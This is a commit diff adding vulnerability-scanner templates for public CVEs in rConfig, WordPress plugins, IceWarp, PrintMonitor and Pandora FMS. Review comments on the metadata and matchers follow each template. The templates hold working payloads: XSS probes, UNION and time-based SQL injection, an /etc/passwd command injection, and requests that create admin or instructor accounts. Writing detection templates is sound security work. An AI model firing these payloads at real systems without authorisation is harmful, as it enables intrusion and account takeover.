templates added

patch-1
Prince Chaddha 2023-10-17 12:50:28 +05:30
parent f08daa5e82
commit 1b2fddb9cb
155 changed files with 6282 additions and 90 deletions

@ -0,0 +1,36 @@
id: CVE-2023-37728
info:
name: Icewarp Icearp v10.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
shodan-query: http.favicon.hash:2144485375
tags: cve,cve2023,icearp,icewarp,xss
http:
- method: GET
path:
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
- 'contains(body, "<img src onerror=alert(document.domain)>")'
condition: and
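
Review bot: the `classification` block has `cvss-metrics`, `cvss-score` and `cwe-id` but no `cve-id`; add `cve-id: CVE-2023-37728` so it matches the template `id`. The product is spelled "Icearp" in `name`, `description` and the `icearp` tag while the matcher looks for "IceWarp", so confirm the spelling before merge.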

@ -0,0 +1,38 @@
id: CVE-2015-20067
info:
name: WP Attachment Export < 0.2.4 - Unrestricted File Download
author: r3Y3r53
severity: high
description: |
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
reference:
- https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
- https://packetstormsecurity.com/files/132693/
- https://seclists.org/fulldisclosure/2015/Jul/73
- https://nvd.nist.gov/vuln/detail/CVE-2015-20067
classification:
cve-id: CVE-2015-20067
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: 862
metadata:
max-request: 2
verified: true
tags: cve,cve2015,wordpress,wp,wp-plugin,access,control,unauth
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
- "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/xml")'
- 'contains_all(body, "title","wp:author_id","wp:author_email")'
condition: and
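
Review bot: `cwe-id: 862` in `classification` is missing the `CWE-` prefix that the other templates in this commit use; write `cwe-id: CWE-862`. The tags `access,control` also read like a single `access-control` tag that was split by the comma.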

@ -0,0 +1,48 @@
id: CVE-2018-7282
info:
name: TITool PrintMonitor - Blind SQL Injection
author: theamanrawat
severity: critical
description: |
The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
remediation: Upgrade to PM18.2.1.
reference:
- https://fenceposterror.github.io/cve-2018-7282.txt
- https://nvd.nist.gov/vuln/detail/CVE-2018-7282
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7282
cwe-id: CWE-89
metadata:
verified: "true"
shodan-query: title:"PrintMonitor"
max-request: 1
cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:*
vendor: titool
product": printmonitor
tags: cve,cve2018,sqli,printmonitor,unauth
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
http:
- raw:
- |
@timeout: 20s
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en
host-redirects: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "PrintMonitor") && contains(header, "text/html")'
condition: and
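
Review bot: `product": printmonitor` under `metadata` has a stray double quote, so the key is not `product`; change it to `product: printmonitor`. `verified: "true"` is a quoted string here while most templates in this commit use the boolean `verified: true`. The matcher depends on a single `duration>=6` reading, so a slow host that serves the PrintMonitor login page can match without being vulnerable; comparing against a baseline request would reduce false positives. The description's "vulnerable to and/or time-based blind SQLi" looks like it lost a word.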

@ -0,0 +1,37 @@
id: CVE-2019-15829
info:
name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
reference:
- https://wpscan.com/vulnerability/9443
- https://nvd.nist.gov/vuln/detail/CVE-2019-15829
metadata:
max-request: 2
verified: true
tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
- 'contains(body_2, "post galleries!")'
condition: and
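
Review bot: `tags` carries `cve2023` for a template whose `id` is CVE-2019-15829; it should be `cve2019`. There is also no `classification` block (cvss, `cve-id`, `cwe-id`), which most other templates in this commit provide.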

@ -1,49 +1,39 @@
id: CVE-2020-10220
info:
name: rConfig 3.9 - SQL injection
author: ritikchaddha
name: rConfig 3.9 - SQL Injection
author: theamanrawat
severity: critical
description: |
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
remediation: |
Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://www.exploit-db.com/exploits/48208
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220
- http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html
- http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html
- https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-10220
cwe-id: CWE-89
epss-score: 0.02204
epss-percentile: 0.88193
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: rconfig
product: rconfig
shodan-query: title:"rConfig"
tags: packetstorm,cve,cve2020,rconfig,sqli
shodan-query: http.title:"rConfig"
tags: cve,cve2020,rconfig,sqli
variables:
num: "999999999"
num: 999999999
http:
- raw:
- |
GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1
Host: {{Hostname}}
- method: GET
path:
- "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- "{{md5(num)}}"
- type: status
status:
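
Review bot: both `author: ritikchaddha` and `author: theamanrawat` appear near the top, and the header takes the file from 49 to 39 lines, which reads like an existing template being overwritten by a resubmission rather than edited. The +/- markers are not visible in this view, but if the `remediation`, `epss-score`, `epss-percentile`, `cpe`, `vendor` and `product` lines and the `packetstorm` tag are on the removed side, please keep them together with the original author credit and limit the change to the request and matcher.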

@ -0,0 +1,48 @@
id: CVE-2020-12256
info:
name: rConfig 3.9.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12256
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-12256
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.title:"rConfig"
max-request: 1
tags: cve,cve2020,rconfig,authenticated,xss
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /devicemgmt.php?deviceId="><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition: and
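
Review bot: the description names `devicemgmnt.php` twice, but the third request goes to `/devicemgmt.php`; one of the two spellings is wrong, and if it is the request path the template will not reach the affected page. `max-request: 1` does not match the three raw requests, and the payload in the request line is sent unencoded (`"><script>...`), unlike the percent-encoded payloads elsewhere in this commit.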

@ -0,0 +1,48 @@
id: CVE-2020-12259
info:
name: rConfig 3.9.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-12259
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.title:"rConfig"
max-request: 1
tags: cve,cve2020,rconfig,authenticated,xss
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition: and
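
Review bot: the description says the flaw is in `configDevice.php` and then places the `rid` parameter in `devicemgmnt.php`; the request targets `/configDevice.php?rid=`, so the second filename looks like a leftover from the CVE-2020-12256 template. The `name` is identical to that template's ("rConfig 3.9.4 - Cross-Site Scripting"), which makes the two findings indistinguishable in scan output; add the affected page or parameter to the name. `max-request: 1` also does not match the three requests.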

@ -0,0 +1,95 @@
id: CVE-2020-13638
info:
name: rConfig 3.9 - Authentication Bypass(Admin Login)
author: theamanrawat
severity: critical
description: |
lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13638
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-13638
cwe-id: CWE-89
metadata:
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2020,rconfig,authenticatio-bypass,escalation
variables:
username: "{{to_lower(rand_text_alpha(5))}}"
password: "{{rand_text_alphanumeric(12)}}!"
email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
http:
- raw:
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="username"
{{username}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="passconf"
{{password}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="password"
{{password}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email"
{{email}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid"
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="add"
add
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="ulevelid"
9
--01b28e152ee044338224bf647275f8eb--
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
cookie-reuse: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- "rConfig - Configuration Management"
- "Logged in as"
- "dashboadFieldSet"
condition: and
- type: word
part: header_3
words:
- 'text/html'
- type: status
status:
- 200
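
Review bot: the first request submits `add` with `ulevelid` 9 to `/lib/crud/userprocess.php` and the third logs in with the same random credentials, so every positive result leaves a new account on the scanned host; tag the template `intrusive` and say so in the description so operators can exclude it and know to clean up. `cwe-id: CWE-89` is SQL injection and does not fit the authentication bypass the description reports, the tag `authenticatio-bypass` is missing an "n", the `name` needs a space before "(Admin Login)", and `max-request` is absent.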

@ -0,0 +1,46 @@
id: CVE-2020-13851
info:
name: Artica Pandora FMS 7.44 - Remote Code Execution
author: theamanrawat
severity: high
description: |
Artica Pandora FMS 7.44 allows remote command execution via the events feature.
reference:
- https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-13851
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-13851
cwe-id: CWE-78
metadata:
verified: "true"
shodan-query: title:"Pandora FMS"
max-request: 1
tags: cve,cve2020,rce,pandora,unauth,artica
http:
- raw:
- |
POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: header
words:
- "text/html"
- "PHPSESSID="
condition: and
- type: status
status:
- 200
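
Review bot: `cve-id: CVE-2022-13851` under `classification` does not match the template `id` CVE-2020-13851; fix the year. The `unauth` tag also conflicts with `PR:L` in `cvss-metrics`, and the single request carries no login step, so either the tag or the vector needs to be checked against the advisory.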

@ -0,0 +1,56 @@
id: CVE-2020-8615
info:
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
author: r3Y3r53
severity: medium
description: |
A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
remediation: update to v.1.5.3
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-8615
- https://wpscan.com/vulnerability/10058
- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
cvss-score: 6.5
cwe-id: CWE-352
cve-id: CVE-2020-8615
cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/tutor/"
tags: cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,wpscan
variables:
user: "{{rand_base(6)}}"
pass: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "application/json")'
- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
- 'status_code_2 == 200'
condition: and
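
Review bot: `tags` has `cve2023` for CVE-2020-8615 and lacks `authenticated`, although the first request logs in with `{{username}}` and `{{password}}`. The second request body sets `action` twice (`action=add_new_instructor` at the start and `action=tutor_add_instructor` at the end); keep only the one the plugin handles. A match means an instructor account was created on the target, so the template should also be tagged `intrusive`. `max-request: 1` does not match the two requests, and the `name` says 1.5.3 while the description says the issue is in versions before 1.5.3.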

@ -0,0 +1,45 @@
id: CVE-2021-24215
info:
name: Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation
author: r3Y3r53
severity: critical
description: |
An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource.
remediation: Fixed in version 1.5.2
reference:
- https://wpscan.com/vulnerability/eec0f29f-a985-4285-8eed-d1855d204a20
- https://nvd.nist.gov/vuln/detail/CVE-2021-24215
- https://www.opencve.io/cve/CVE-2021-24215
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-284
cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/controlled-admin-access/"
tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")'
condition: and
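
Review bot: the matcher only shows that the account in `{{username}}`/`{{password}}` can open `/wp-admin/options.php` on a site where "Controlled Admin Access" appears in the page; a regular administrator account would likely satisfy all three conditions on a patched site. Document that the credentials must belong to a user restricted by the plugin, or add a condition that distinguishes that case. The `name` gives `<= 1.4.0` while `remediation` says fixed in 1.5.2, `classification` has no `cve-id`, and `max-request: 1` does not match the two requests.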

@ -0,0 +1,45 @@
id: CVE-2021-24286
info:
name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
remediation: Fixed in version 1.3.1
reference:
- https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27
- https://www.exploit-db.com/exploits/50350
- https://nvd.nist.gov/vuln/detail/CVE-2021-24286
- https://wordpress.org/plugins/redirect-404-to-parent/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")'
- 'status_code_2 == 200'
condition: and
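
Review bot: the body matcher `contains(body_2, "alert%28document.domain%29")` looks for the percent-encoded payload, which is what a page prints when it echoes the request URL, not what an unescaped reflection of the decoded `tab` value into an attribute looks like; match on the decoded `onanimationstart="alert(document.domain);` text instead. `tags` has `cve2023` for CVE-2021-24286 and lacks `cve2021`, `classification` has no `cve-id`, and `max-request: 1` does not match the two requests.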

@ -0,0 +1,57 @@
id: CVE-2021-24627
info:
name: G Auto-Hyperlink <= 1.0.1 - SQL Injection
author: theamanrawat
severity: high
description: |
The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection
reference:
- https://wordpress.org/plugins/g-auto-hyperlink/
- https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb
- https://nvd.nist.gov/vuln/detail/CVE-2021-24627
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24627
cwe-id: CWE-89
metadata:
verified: true
publicwww-query: "/wp-content/plugins/g-auto-hyperlink/"
tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated
variables:
num: 999999999
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+I
- |
GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "c8c605999f3d8352d7bb792cf3fdb25b"
- "Keyword"
- "g-auto-hyperlink-edit"
condition: and
- type: word
part: header_2
words:
- "text/html"
- type: status
status:
- 200
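
Review bot: the login body ends in `wp-submit=Log+I`, missing the final "n" that every other WordPress login request in this commit sends (`wp-submit=Log+In`). The top-level key is `requests:` where the rest of the commit uses `http:`, the matcher hardcodes `c8c605999f3d8352d7bb792cf3fdb25b` instead of deriving it from the `num` variable with `{{md5(num)}}`, and `max-request` is missing.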

@ -0,0 +1,46 @@
id: CVE-2021-24791
info:
name: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection
author: r3Y3r53
severity: high
description: |
The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections
remediation: Fixed in version 1.1.14
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24791
- https://wpscan.com/vulnerability/d55caa9b-d50f-4c13-bc69-dc475641735f
- https://wordpress.org/plugins/header-footer-code-manager/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24791
cwe-id: CWE-89
metadata:
verified: true
google-query: inurl: "/plugins/header-footer-code-manager/"
max-request: 1
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 20s
GET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2,"Add New Snippet")'
condition: and
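
Review bot: `duration>=6` in the dsl matcher has no request suffix while the other three conditions use `_2`; use `duration_2>=6`, as the CVE-2022-0228 template in this commit does, so the timing check is tied to the `SLEEP(6)` request and not to the login. `google-query: inurl: "/plugins/header-footer-code-manager/"` has a space after `inurl:`, and `max-request: 1` does not match the two requests.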

@ -0,0 +1,53 @@
id: CVE-2021-24915
info:
name: Contest Gallery < 13.1.0.6 - SQL injection
author: r3Y3r53
severity: critical
description: |
The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.
remediation: Fixed in version 13.1.0.6
reference:
- https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac
- https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917
- https://wordpress.org/plugins/contest-gallery/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24915
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
public-query: "/wp-content/plugins/contest-gallery/"
tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery
http:
- raw:
- |
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'WpUserId'
- 'Username'
- 'Usermail'
condition: and
- type: word
part: header
words:
- 'text/csv'
- 'filename='
condition: and
- type: status
status:
- 200
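
Review bot: the matchers never look for the `0x717a6b7871` / `0x716b707871` delimiters that the UNION payload wraps around `VERSION()`; they only check the CSV column names and the `text/csv` header, which any successful export returns. As written a match shows the unauthenticated export, not the injection, so either match the delimited value in the body or rename the template to describe what it proves. `public-query` should be `publicwww-query` as in the other templates, and the tags are missing `sqli` and `unauth`.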

@ -0,0 +1,45 @@
id: CVE-2021-24979
info:
name: Paid Memberships Pro < 2.6.6 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting
remediation: version 2.6.6
reference:
- https://wpscan.com/vulnerability/fc011990-4ec1-4553-901d-4ff1f482cb79
- https://nvd.nist.gov/vuln/detail/CVE-2021-24979
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24979
cwe-id: CWE-79
metadata:
verified: true
publicwww-query: "/wp-content/plugins/paid-memberships-pro/"
max-request: 1
tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")'
- 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")'
condition: and
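
Review bot: the body matcher expects `style=animation-name:rotation+onanimationstart=alert(document.domain)//` with literal `+` characters, but `+` in a query string is decoded to a space before the `s` value is printed, so this string matches only where the raw request URL is echoed and not where the value lands in the attribute. Match the space-separated form, including the closing quote that precedes it. `tags` has `cve2023` for CVE-2021-24979, `remediation: version 2.6.6` should say to upgrade to it, and `max-request: 1` does not match the two requests.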

@ -1,32 +1,17 @@
id: CVE-2021-25016
info:
name: Chaty < 2.8.2 - Cross-Site Scripting
author: luisfelipe146
name: Chaty Free < 2.8.3 & Pro < 2.8.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
